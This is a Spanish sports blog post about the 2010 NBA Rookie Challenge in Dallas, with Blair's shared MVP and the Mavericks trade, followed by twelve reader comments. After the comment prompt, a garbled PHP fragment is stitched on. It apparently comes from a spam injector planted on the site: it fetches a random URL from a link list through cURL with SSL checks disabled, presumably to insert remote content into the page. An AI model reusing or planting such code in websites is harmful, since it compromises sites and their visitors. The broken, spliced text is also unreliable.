DALLAS 2010: THE ROOKIE CHALLENGE

13 de February de 2010 por TheDeerHunter

Nadie dábamos un duro por los Rookies. De hecho, no sabemos por qué, pero hemos ido menospreciándolos desde el principio y ellos se han empeñado en dejarnos a todos en evidencia en cada una de las perspectivas negativas que se han lanzado de ellos. Desde el año 2002, en el que debutó Pau Gasol, no ganaba el equipo de 1er año. Ya ha llovido desde entonces.

Anoche no parecía el mejor momento para cambiar la tendencia. La calidad interior del equipo de Sophomores impresionaba a priori: Brook López, Kevin Love, Marc Gasol y Michael Beasley, casi nada. Posiblemente el más versátil y completo juego interior en este evento de toda su historia. Y por fuera tampoco presentan debilidades: Westbrook, Mayo, Eric Gordon… menuda hornada.

En frente, como decimos, está demostrada la “inesperada” calidad de esta hornada de rookies, aunque lógicamente se tenían dudas de un frontcourt formado casi en exclusividad por Dajuan Blair. El resto del quinteto titular eran Tyreke, Jennings, Curry y Casspi… small ball a tutiplén.

El caso es que se juntaron varios factores. Posiblemente los Rookies no tenían muchas alternativas, así que no dudaron en imponer un ritmo concreto al partido. Se les vio mucho más centrados en la faena. En el caso de los jugadores de 2º año, no sabemos si intentando conscientemente no abusar, desdeñaron su ventaja interior desde el principio. Los hombres grandes se perdieron correteando arriba y abajo inútilmente, sobre todo Brook López, que debe de estar hasta el gorro de que le toreen… y el resto a montarse su fiesta particular. Westbrook buscaba obsesivamente heredar el trono de Durant… y Beasley haciendo de sí mismo. Los demás de palmeros. Nunca he podido digerir eso de que en un evento así salga uno desde el primer minuto y se quede con la bola sin que los demás puedan hacer nada. ¿Quién decide quién será el chupón de turno? Me intriga saber quién impone la jerarquía.

Los Rookies tenían muy claro qué hacer cada uno. Infinitamente más solidarios partiendo del esfuerzo de Blair y el liderato no impuesto de Tyreke y Jennings. Harden, Curry, Casspi ayudando sin forzar. El mínimo de criterio fue una ventaja insuperable.

Supongo que a nivel de marketing hubiera molado un MVP compartido para Tyreke y Jennings, dejando de paso en tablas momentáneas la carrera por el RoY. Se metió Blair en medio y de qué manera. Dio esfuerzo a raudales y también espectáculo. No es nada fácil para un jugador de su perfil destacar en estos eventos. La mejor historia de la noche, sin duda, y hubo gente que abucheó la parte de MVP que le tocó a Tyreke. No sabría decir si fue justo compartirlo, pero lo que es seguro es que Blair sí se lo mereció.

En el descanso pudimos disfrutar del aperitivo del concurso de mates con una previa entre Eric Gordon y DeRozan. El evento quedó un tanto frío y DeRozan seguirá esta noche tras mostrar un buen mate por debajo de las piernas. Gordon muy nervioso y no demasiado preparado para el reto. No parece una fórmula que mejore demasiado el resultado. La NBA deberá estrujarse más la sesera.

Por último, mención a la gran noticia del día de ayer. Butler, Haywood y Deshawn Stevenson a Dallas a cambio de Josh Howard y Drew Gooden. Braguetazo de Marc Cuban y los Mavs vuelven a ponerse en la pomada. Kidd-Butler-Marion-Nowitzki-Haywood es un quinteto a tener en cuenta. Bravísimo por los Mavs.

Comenta

12 comentarios a esta entrada

  1. kantonyo dice:
    #1

    No era tan descabellado que los rookies ganaran el partido, teniendo en cuenta el tipo de encuentro que es, lo más normal es que un equipo con mejores jugadores exteriores gane. Era un autentico correcalles y sino que se lo digan a Brook Lopez, que estaba hasta los cojones de correr de un lado para otro. Si a esto le añadimos que a DeJuan Blair no le gusta perder ni a las canicas …

    Respecto al trade de Wizards-Mavs, me parece que los Mavs ganan bastante, dan un paso importante para ser favoritos en el Oeste.

      Citar

  2. Viva_Dirk dice:
    #2

    Pensaba que meterian el expiring de Dampier en lugar de a Gooden. Ese sería el paso definitivo para ponerse a la altura de Lakers, largar ese goloso expiring a cambio de un escolta.

    En el partido los rookies salieron bastante mas centrados y los de segundo año desaprovecharon a los de dentro.

      Citar

  3. CAMPO2 dice:
    #3

    Soy de lo nets pero este año donde haya un partido que juege alguno de ese equipo palman seguro.

      Citar

  4. Dantley2 dice:
    #4

    “¿Quién decide quién será el chupón de turno? Me intriga saber quién impone la jerarquía.”

    jo, jo, enorme reflexión ¡¡¡ La verdad es que merecería un análisis profundo el tema

    Yo se lo hubiera dado a Blair, en un partido de este tipo es tremendo hacer eso

      Citar

  5. sergio dice:
    #5

    Blair fue mejor y Evans puso mas espectaculo… uno compartido no hubiese estado mal creo yo. Eso si, si hubiese que elegir… Blair por supuesto, que ha superado el record de rebotes de Brand en el 2000.

      Citar

  6. kantonyo dice:
    #6

    Yo se lo daría sólo a Blair, no por su números, sino por lo que hizo al final, cogia todos los rebotes y metía todas las canastas como si se estuviera jugando la vida, incluso Brook Lopez le cogio estilo lucha grecorromana en plan cachondeo y el pívot de San Antonio logró encestar con el asombro de todos. Un CRack!!! Que bien nos hubiera venido a Portland, que pena de Draft!

      Citar

  7. Txusma dice:
    #7

    Hay q dcir que con lo relajado q era el partido en cuanto un jugador le pusiera un poco de intensidad se podia disparar a nivel reboteador y eso fue lo q hizo Blair en los ultimos 5 minutos. Me parece muy justo el premio para eél y tb para Tyreke que sinceramente, parecía estar 2 o 3 pasos por encima del resto. Lo que consigioó, con canastas de mucho merito, lo hizo apenas sin esfuerzo, demostrando que podria jugar con los grandes sin ningun problema.
    Esta noche habra alguien viendo los concursos o tb me quedaré casi solo? Malandrines!

      Citar

  8. sergio dice:
    #8

    Yo los vere Txus… pero como al igual que ayer, este suele ser un fin de semana en el que veo casi todo con los colegas o alguna amiga en alguna casa… y mas con el frio que hace estos dias. Si nos quedamos en mi casa estupendo… me conectare, pero si no sera dificil. Lo siento si no puede ser… Por cierto, a que hora esta programado que empiecen los mates?

      Citar

  9. Queco dice:
    #9

    Yo ayer me quedé dormido en el sofá… a ver si hoy tomando algo de café xD

      Citar

  10. Txusma dice:
    #10

    Te tengo tomada la matricula, Qeko. Confiaba plenamente en ti! XD

      Citar

  11. Queco dice:
    #11

    Hoy pongo el despertador del movil, por si acaso jaja. Además, ayer el portatil corrió serio riesgo, que lo tenía en las rodillas….

      Citar

  12. M dice:
    #12

    Yo lo intento, pero no zé…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>